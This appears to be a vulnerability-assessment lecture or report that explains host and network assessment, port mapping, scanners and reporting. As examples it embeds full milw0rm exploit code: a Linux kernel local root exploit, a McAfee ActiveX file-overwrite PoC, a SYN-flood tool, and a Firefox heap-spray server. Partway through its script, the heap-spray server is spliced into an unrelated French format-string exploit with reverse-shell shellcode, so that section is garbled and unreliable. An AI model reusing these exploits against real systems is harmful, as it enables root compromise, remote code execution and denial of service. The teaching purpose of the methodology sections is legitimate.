vulnerability assessment report

Vulnerability Assessment: A vulnerability Assessment is the process of identifying, quantifying, and prioritizing (ranking) the vulnerabilities in a system. The discipline of vulnerability assessment comprises host-based vulnerability assessment, related to the inside configuration of a host, and network-based vulnerability assessment, focused on the vulnerabilities visible and exploitable on the network.

Both kinds of vulnerability assessment are required for maximum effectiveness, as vulnerabilities can be exploited by an entity inside the security perimeter (i.e.a legitimate user), or initiated from outside the perimeter, by an unauthorised or illegitimate user.

Remote vs local attacks:

Why we need VA ? To create a healthy Network. To prevent outside (unauthorised) user. To be Hack proof To create a secure software

What all can be Vulnerable ?

OS (Operating System)

AV (Antivirus)

Firewall

Browsers

Applications (Desktop/Web-Based)

Example(OS)/*********************************************************** * hoagie_udp_sendmsg.c * LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) - CVE-2009-2698 * * udp_sendmsg bug exploit via (*output) callback function * used in dst_entry / rtable * * Bug reported by Tavis Ormandy and Julien Tinnes * of the Google Security Team * * Tested with Debian Etch (r0) * * $ cat /etc/debian_version * 4.0 * $ uname -a * Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux * $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg * $ ./hoagie_udp_sendmsg * hoagie_udp_sendmsg.c - linux root < 2.6.19 local * -andi / void.at * * sh-3.1# id * uid=0(root) gid=0(root) Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(andi) * sh-3.1# * * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF- * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY * DAMAGE DONE USING THIS PROGRAM. * * VOID.AT Security * [email protected] * http://www.void.at * ************************************************************/#include <stdio.h>#include <stdlib.h>#include <string.h>#include <errno.h>#include <unistd.h>#include <netinet/in.h>#include <arpa/inet.h>#include <sys/socket.h>#include <sys/mman.h>

/** * this code will be called from NF_HOOK via (*output) callback in kernel mode */void set_current_task_uids_gids_to_zero() { asm("push %eax\n" "movl $0xffffe000, %eax\n" "andl %esp, %eax\n" "movl (%eax), %eax\n"

"movl $0x0, 0x150(%eax)\n" "movl $0x0, 0x154(%eax)\n" "movl $0x0, 0x158(%eax)\n" "movl $0x0, 0x15a(%eax)\n" "movl $0x0, 0x160(%eax)\n" "movl $0x0, 0x164(%eax)\n" "movl $0x0, 0x168(%eax)\n" "movl $0x0, 0x16a(%eax)\n" "pop %eax\n");}

int main(int argc, char **argv) { int s; struct msghdr header; struct sockaddr_in sin; char *rtable = NULL;

fprintf(stderr, "hoagie_udp_sendmsg.c - linux root <= 2.6.19 local\n"

"-andi / void.at\n\n");

s = socket(PF_INET, SOCK_DGRAM, 0); if (s == -1) { fprintf(stderr, "[*] can't create socket\n"); exit(-1); }

/** * initialize required variables */ memset(&header, 0, sizeof(struct msghdr)); memset(&sin, 0, sizeof(struct sockaddr_in)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr("127.0.0.1"); sin.sin_port = htons(22); header.msg_name = &sin; header.msg_namelen = sizeof(sin);

/** * and this is the trick: * we can use (*output)(struct sk_buff*) from dst_entry (used by rtable) as a callback (=> offset 0x74) * so we map our rtable buffer at offset 0 and set output callback function * * struct dst_entry * { * struct dst_entry *next; * atomic_t __refcnt; client references * int __use; * struct dst_entry *child; * struct net_device *dev; * short error; * short obsolete; * int flags; * #define DST_HOST 1 * #define DST_NOXFRM 2 * #define DST_NOPOLICY 4

* #define DST_NOHASH 8 * #define DST_BALANCED 0x10 * unsigned long lastuse; * unsigned long expires; * * unsigned short header_len; * more space at head required * * unsigned short trailer_len; * space to reserve at tail * * * u32 metrics[RTAX_MAX]; * struct dst_entry *path; * * unsigned long rate_last; * rate limiting for ICMP * * unsigned long rate_tokens; * * struct neighbour *neighbour; * struct hh_cache *hh; * struct xfrm_state *xfrm; * * int (*input)(struct sk_buff*); * int (*output)(struct sk_buff*); * * #ifdef CONFIG_NET_CLS_ROUTE * __u32 tclassid; * #endif * * struct dst_ops *ops; * struct rcu_head rcu_head; * * char info[0]; * }; * * struct rtable * { * union * { * struct dst_entry dst; * struct rtable *rt_next; * } u; * * struct in_device *idev; * * unsigned rt_flags; * __u16 rt_type; * __u16 rt_multipath_alg; * * __be32 rt_dst; * Path destination * * __be32 rt_src; * Path source * * int rt_iif; * * * Info on neighbour * * __be32 rt_gateway; * * * Cache lookup keys * * struct flowi fl;

* * * Miscellaneous cached information * * __be32 rt_spec_dst; * RFC1122 specific destination * * struct inet_peer *peer; * long-living peer info * * }; * */ rtable = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); if (rtable == MAP_FAILED) { fprintf(stderr, "[*] mmap failed\n"); exit(-1); } *(int *)(rtable + 0x74) = (int)set_current_task_uids_gids_to_zero;

/* trigger exploit * * the second sendmsg() call will call ip_append_data() with rt == NULL * because of: * if (up->pending) { * * * * There are pending frames. * * The socket lock must be held while it's corked. * * * lock_sock(sk); * if (likely(up->pending)) { * if (unlikely(up->pending != AF_INET)) { * release_sock(sk); * return -EINVAL; * } * goto do_append_data; * } * release_sock(sk); * } * */ sendmsg(s, &header, MSG_MORE|MSG_PROXY); sendmsg(s, &header, 0);

close(s);

system("/bin/sh");

return 0;}

// milw0rm.com [2009-09-02]

Example(AV):

GOODFELLAS Security Research TEAMhttp://goodfellas.shellcode.com.arGreetings to str0ke

McAfee, Inc. 3.6.0.608 Policy Manager naPolicyManager.dll Arbitrary Data Write==============================================================================

Internal ID: VULWAR20090616.-----------

Introduction------------

naPolicyManager.dll is a library included in the Program Mc Afee inc.

Tested In---------

- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.

Summary-------

The WriteTaskDataToIniFile method doesn't check if it's being called from theapplication or from a malicious user. A Remote Attacker could craft a html page and overwrite arbitrary files in a system.

Impact------

The vulnerability could allow malicious users to write arbitrary data on a vulnerable system that uses this software.

Workaround----------

- Activate the Kill bit zero in the clsid corresponding to the software.- Unregister naPolicyManager.dll using regsvr32.

Timeline--------

July 16 2009 -- Bug Discovery.July 16 2009 -- POC published.

Credits-------

* callAX <[email protected]>

Technical Details-----------------

WriteTaskDataToIniFile method receives one argument filename in this format"c:\path\file".

Proof of Concept---------------

<HTML><BODY> <object id=ctrl classid="clsid:{04D18721-749F-4140-AEB0-CAC099CA4741}"></object><SCRIPT>function Do_1t() { File = "C:\b00t.ini" ctrl.WriteTaskDataToIniFile(File) }</SCRIPT><input language=JavaScript onclick=Do_1t() type=button value="P0c"></BODY></HTML>

# milw0rm.com [2009-06-16]

Example(Firewall):# The easy way by logic [email protected] (line 2) untested /str0ke# hping -c 1 -S -s 31337 -k -b -p 22 10.0.xx.xxx

#!/usr/bin/perleval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed \n" if $@;eval ("use Term::ProgressBar;");die "[error] Term::ProgressBar perl module is not installed \n" if $@;my $VERSION = "0.1";print "$0, $PgmName, V $VERSION \n";GetOptions ( "help" =>\$usage,"device=s" => \$device, "source=s" =>\$sourceip,"dest=s"=>\$destip,"sourcemac=s"=>\$sourcemac,"destmac=s"=>\$destmac,"port=n"=> \$tcpport,);

######################## Config option ####################

my $timeout = "0,1"; # Timeout

if ($usage) {&usage;}

if (!$device) {$device= 'eth0'; # Network device}

if (!$destmac) {print "Dest MAC not found \n"; &usage;}if (!$sourceip) {print "Source IP not found \n"; &usage;}if (!$destip) {print "Dest IP not found \n"; &usage;}if (!$tcpport) {print "TCP port not found \n"; &usage;}

my $syn="1"; # TCP SYN SETmy $tcpdata = "TEST"; # TCP payloadmy $count=0;

######################################################

#Initialize Progres Bar my $progress = Term::ProgressBar->new(32768);$progress->minor(0);$packet = new Net::RawIP;$packet-> ethnew($device);

if (!$sourcemac) {$packet -> ethset( dest => $destmac);}else { $packet -> ethset( source =>$sourcemac, dest => $destmac);}

for ($count=0; $count< 65537 ; $count++) {

$packet->set({

ip => {saddr => $sourceip,daddr => $destip },

tcp => {check => 0x0010 , # TCP Packet Checksum 0 for auto correctsource => $count,dest => $tcpport,syn => $syn,data => $tcpdata}});$packet->ethsend($timeout);#$packet->send($timeout);

$progress->update($_);$count++;}

sub usage {print <<EOF ;This program was originally written in the due course of writing"Hacking Exposed Cisco Networks: Cisco Security Secrets and Solutions" book.Tool author - Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs and comments to [email protected]

usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC][--destmac=MAC] [--port=n]

Options:

--help This message--device Network interface (defaut set eth0)--source Victim source IP--dest Victim destination IP--sourcemac Victim source MAC--destmac MAC Address of the gateway--port TCP port

Example: ./pixdos.pl --device eth0 --source 192.168.44.10 --dest 192.168.55.111 \--sourcemac 00:90:27:99:11:b6 --destmac 00:60:27:99:11:b6 --port 22 EOF

exit shift;}

# milw0rm.com [2005-11-23]

Example(Browser):################################################### FireFox 3.5 Heap Spray# Discovered by: Simon Berry-Bryne# Coded in Perl by netsoul, ALTO PARANA - Paraguay# Contact: netsoul2 [at] gmail [dot] com##################################################

#!/usr/bin/perl -wuse strict;use POE::Component::Server::HTTP;POE::Component::Server::HTTP->new(Port => my $port = 8080,ContentHandler => {"/" => sub{$_[1]->push_header("Content-Type", "text/html"), $_[1]->content(<DATA>)}});

print "[-] Listening in port $port...\n[-] Sending payload...\n[-] After 30 secs try with netcat for connect in port 5500\n";POE::Kernel->run();

__DATA__<html><head><title>Exploiting Firefox 3.5</title><script language= javascript>//windows - shell_bind_tcp - metasploit - encoding is shikata_ga_nai

* d'une technique avance d'exploitation des chaines de * format. * * Toute la difficulte de l'exploitation est liee au fait * que la chaine de format se trouve dans un thread, et * la pile remplie avec des adresses du tas. * On est donc oblige d'utiliser la technique dite de * "l'ebp chaining". * * On pardonnera le manque de proprete et de portabilite, * defauts qui sont expliques et corriges durant son * utilisation sur la plateforme de tutoriaux de * l'Epitech Security Laboratory. */

/* Traduction: * This is ugly and not cross plateform, use it for * learning purpose. (^-^) */

#include <stdlib.h>#include <stdio.h>#include <string.h>#include <strings.h>#include <unistd.h>

#include <netinet/in.h>#include <arpa/inet.h>

#include <sys/types.h>#include <sys/socket.h>

int connect_(char *, int);void exit_(int, char *);char *get_payload(unsigned short, unsigned short/* , unsigned short * */);void progressbar(void);void write_short(unsigned short, unsigned short);

#define REQUEST "GET / HTTP/1.0\r\n" \ "Connection: "

/* Chaining ebp // FREEBSD8 - 0.8.6d : * * (0xbf5fa838) -> 0xbf5fafa8 // 12$ httpd_FileCallBack() * _____________/ * / * (0xbf5fafa8) -> 0xbf5fafe8 // 488$ httpd_HostThread() * _____________/ * / * (0xbf5fafe8) -> 0x00000000 // 504$ pthread_getprio() * * (0xbfbee2b8) // (bf5f)e2b8 is an eip value * because we write short by short, * we've just have to write (bfbe) * in order to have the sc addr. * (0xbf5fa83c) // An eip -> 12$ + 4 */

#define FIRST_EBP 12#define SECOND_EBP 488#define THIRD_EBP 504

#define FBSD8_ESP ( 0xbf5fa808 )#define FBSD8_SCADDR ( 0xbfbee2b8 )

int port;char *ip;

/* bsd_ia32_reverse - LHOST=127.0.0.1 LPORT=4321 Size=92 http://metasploit.com */unsigned char scode[] = "\x33\xc9\x83\xe9\xef\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6c" "\x3c\x56\xcc\x83\xeb\xfc\xe2\xf4\x06\x5d\x0e\x55\x3e\x7e\x04\x8e" "\x3e\x54\x29\xcc\x6c\x3d\x9b\x4c\x04\x2c\x54\xdc\x8d\xb5\xb7\xa6" "\x7c\x6d\x06\x9d\xfb\x56\x34\x94\xa1\xbc\x3c\xce\x35\x8c\x0c\x9d" "\x3b\x6d\x9b\x4c\x25\x45\xa0\x9c\x04\x13\x79\xbf\x04\x54\x79\xae" "\x05\x52\xdf\x2f\x3c\x68\x05\x9f\xdc\x07\x9b\x4c";

int main(int argc, char **argv){ unsigned int i;

if (argc < 3) (void) exit_(1, "Usage: exploit ip port\n"); ip = argv[1]; port = atoi(argv[2]); printf("[+] Victim is : %s:%d...\n", ip, port); printf("[+] Shellcode size : %d // located at : 0x%08x\n",

strlen((char *)scode), FBSD8_SCADDR); printf("[+] EIP is located at : 0x%08x\n", FBSD8_ESP + FIRST_EBP * 4 + 4 + 2);

(void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4) + 2), FIRST_EBP);

(void) write_short((unsigned short)(FBSD8_SCADDR >> 16), SECOND_EBP); (void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4)),

FIRST_EBP);

for (i = 0; i < strlen((char*)scode); i += 2) { (void) write_short((unsigned short)(FBSD8_SCADDR + i), SECOND_EBP); (void) write_short((unsigned short)(*((unsigned short *)(scode + i))),

THIRD_EBP); }

(void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4) + 2), FIRST_EBP);

(void) write_short((unsigned short)(FBSD8_ESP >> 16), SECOND_EBP); (void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4)), FIRST_EBP); (void) write_short((unsigned short)(FBSD8_ESP + FIRST_EBP * 4 + 4 + 2),

SECOND_EBP); (void) write_short((unsigned short)(FBSD8_SCADDR >> 16), THIRD_EBP);

printf("[+] Done.\n"); return (0);}

char *get_payload(unsigned short data, unsigned short pop /* unsigned short *offset */)

{ static char buffer[32]; char buffi[9];

/* data = data - *offset; */ if ((unsigned short)data < 8) { memset(buffi, '0', 9); buffi[data] = '\0'; sprintf(buffer, "%s%%%d$hn", buffi, pop); } else sprintf(buffer, "%%%du%%%d$hn", data, pop); /* *offset = *offset + data; */ return (buffer);}

void write_short(unsigned short data, unsigned short pop){ char buff[1024]; int ret; int sock;

memset(buff, '\0', 42); strcat(buff, REQUEST); strcat(buff, get_payload(data, pop)); strcat(buff, "\r\n\r\n"); sock = connect_(ip, port); if (write(sock, buff, strlen(buff)) < (int)strlen(buff)) (void) exit_(1, "[-] write()\n"); while ((ret = read(sock, buff, 1024))) ; if (close(sock) < 0) (void) exit_(1, "[-] close()\n"); return ;}

void exit_(int i, char *tyop){ write(2, tyop, strlen(tyop)); (void) exit(i);}

int connect_(char *ip, int port){ int sock; struct sockaddr_in s;

(void) progressbar(); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)

(void) exit_(1, "[-] socket()\n"); bzero(&s, sizeof(s)); s.sin_family = AF_INET; s.sin_port = htons(port); s.sin_addr.s_addr = inet_addr(ip); if (connect(sock, (struct sockaddr *)&s, sizeof(s)) < 0) (void) exit_(1, "[-] connect()\n"); return (sock);}

void progressbar(void){ static unsigned int c = 0;

write(1, "D ", 12- write(1, "[?] 8=====", 5 + ((c >> 2 & 1 ? -1 : 1)

* (++c & 3) + (c % 0x20 & 100))));

write(1, "p0wn in progress", 19); write(1, "...", c / 4 % 4); write(1, " \r", 4); return ;}

// milw0rm.com [2008-04-28]

Anatomy of a network-based vulnerability assessment:

The purpose of a network-based vulnerability assessment is to compile an inventory of systems and services attached to the network and, for each system and service, identify the weaknesses and vulnerabilities visible and exploitable on the network, also taking advantage of the attacker’s techniques. The activity aims at remotely assessing a network by finding vulnerabilities on its systems. Results are eventually consolidated in a

report

Steps:

Target acquisition:

To acquire complete knowledge of the network environment to analyse,identifying all the alive hosts and network-attached devices (including network

equipments, network printers, etc.) residing on the portion of network under analysis, along with their available services

Selective protection: We cannot protect everything (too expensive) We are asked to choose what to protect, and how. Choice on the basis of our model of classification

Network mapping: Many different ways (as testing may be performed under various

constraints and conditions): 1. Starting from the network topology …. when available ;-) 2. System-provided tools and information (i.e. ping and traceroute, ICMP

queries, routing tables, DNS interrogation with nslookup, DNS zone transfers, etc.)

3. Specific tools (i.e. nmap, fping, pinger, etc.) Theoretically any layer in the ISO-OSI model can provide useful information. In practice, is carried out mainly by using ICMP, TCP or UDP protocols,

combinations of the above protocols, or protocols residing on upper layers. • Also referred as IP scanning, host discovery, etc.

Port mapping: Port mapping (also known as port scanning) is the process of connecting to

TCP and UDP ports of the target system to determine what ports are in a LISTENING state, possibly identifying also the running services.

More specifically:

1. Identifying the TCP and UDP ports in a LISTENING state; 2. Identifying the TCP and UDP services running on the target system; 3. Identifying RPC registered RPC programs running on the target system; 4. Identifying services unintentionally exposed

An example of port mapping (using nmap) • Carried-out with programs known as port mappers or port scanners (i.e.

nmap, strobe, netcat)

# nmap -sTU 10.0.1.1Starting nmap by [email protected] (www.insecure.org/nmap/)Interesting ports on puma.mydomain.com(10.0.1.3):Port State Service

21/tcp open ftp23/tcp open telnet25/tcp open smtp69/udp open tftp80/tcp open http111/tcp open sunrpc111/udp open sunrpc177/udp open xdmcp2049/tcp open nfs2049/udp open nfs6000/tcp open X11Nmap run completed -- 1 IP address (1 host up) scanned in 13 secondsports in LISTENING stateexpected running service(IANA numbers)http://www.iana.org/assignments/port-numbers

Network-based vulnerability scanning programs Vulnerability scanners take the concept of a port scanner to the next level. The vulnerability scanner identifies not just hosts and open ports but any associatedvulnerabilities automatically instead of relying on human interpretation of the results Automated network-based vulnerability scanning programs assist in:1. extracting information from the target hosts (O.S. version, open ports, active services and

http://www.iana.org/assignments/port-numbers

protocols, version of each running service, exported resources and shares, valid accounts),this phase is also referred as enumeration2. checking all the details against publicly available sources of known vulnerability informationand vendor security alerts to see if known potential vulnerabilities may affect the host3. performing tests and use heuristics to confirm the existence of a real vulnerability (wheneverpossible and according to the level of aggressiveness chosen)4. rating the risk of the vulnerability5. mapping each finding to their related security advisory or alert6. providing fixing direction7. creating reports

Available programs ARC SARA - Security Auditor's Research Assistant eEye Digital Security Retina BindView CyberCop Scanner ISS Internet Security Scanner ISS Internet Scanner Kane Security Analyst NA CyberCop Scanner Nessus Symantec NetRecon Saint corporation Saint (formerly WWDSI) Satan - Security Administrator Tool for Analyzing Networks Vigilante SecureScan NX

… and many others!

Vulnerability confirmation Not all potential vulnerabilities will be confirmed as real vulnerabilities

during the tests. Some network-based vulnerability assessment programs

are able to distinguish between a potential vulnerability and a confirmed vulnerability.

Exploit code, often available from public security resources, can be used to confirm the existence of real vulnerabilities.

Unstructured and manual activity, typically performed by matching information from multiple resources.

Regardless of the success or failure to exploit a potential vulnerability, the underlying vulnerability may still exist. Potential vulnerabilities should therefore be treated with the same seriousness as confirmed vulnerabilities.

Some manual activity still required for double checking (manual tests, check the server log, etc.)

false negatives

Hierarchy of threats The question is a little more difficult to answer and takes experience along

with knowing how the threat was carried out. Which factors contribute more to a website defacement? The Operating System or the type of web server running on the Operating System?

We need a hierarchy of threats. Although the threat is still the website defacement, an attacker could use multiple methods to deface a site. The threat probability is then a combination of which methods of attack are the most popular, along with which system configurations are most susceptible to those popular attacks

Security report • Eventually all the findings are to be consolidated in a final security report. Different levels of information can be included, depending on the audience: technical details, including directions and fix information, for system administrators; summaries for security managers; and high-level graph and

trend reports for executives. The aim is twofold: reports are both input for operative directions and auditing records.

The value of a vulnerability assessment activity is tied to its ability to assist in the remediation of the vulnerabilities found, therefore the final report shouldn’t be just a collection of problems but it must include specific advice on how to close the vulnerabilities.

The report should describe at least 1. scope and methodology 2. detailed findings and directions for improvements, possibly indexed by

risk priority, for the technical personnel. Links to vendor advisories 3. recommendation to avoid the same findings in the future 4. high level management reports, possibly including historic trends, giving

an overall perspective of an organisation’s security posture 5. general recommendations and conclusions • A vulnerability assessment does not last forever, rather the final report is

strictly linked to the timeframe when the scan was performed. A vulnerability assessment is therefore inherently not exhaustive and the faithfulness of

the final report decreases with time. • As people operate computers and networks, and people make mistakes,

the vulnerability assessment must be a periodic and iterative process.

Good candidates for ethical hacking • hacker noun 1. A computer hacker is someone who tries to break into computer systems, especially in order to get secret or confidential information that is stored there. • (Collins COBUILD English dictionary) • “Ethical” hackers employ the same tools and techniques as “criminal”

hackers, but they would neither damage the target systems nor steal information.

Instead

they evaluate the target systems’ security and report back to the owners with

the vulnerability they found and instructions on how to remedy them. • Ethical hackers must be completely trustworthy. While conducting

security tests, the ethical hacker may discover information that should remain secret, and therefore must be trusted to exercise tight control over any information

about a target that could be misused.

vulnerability assessment report

Documents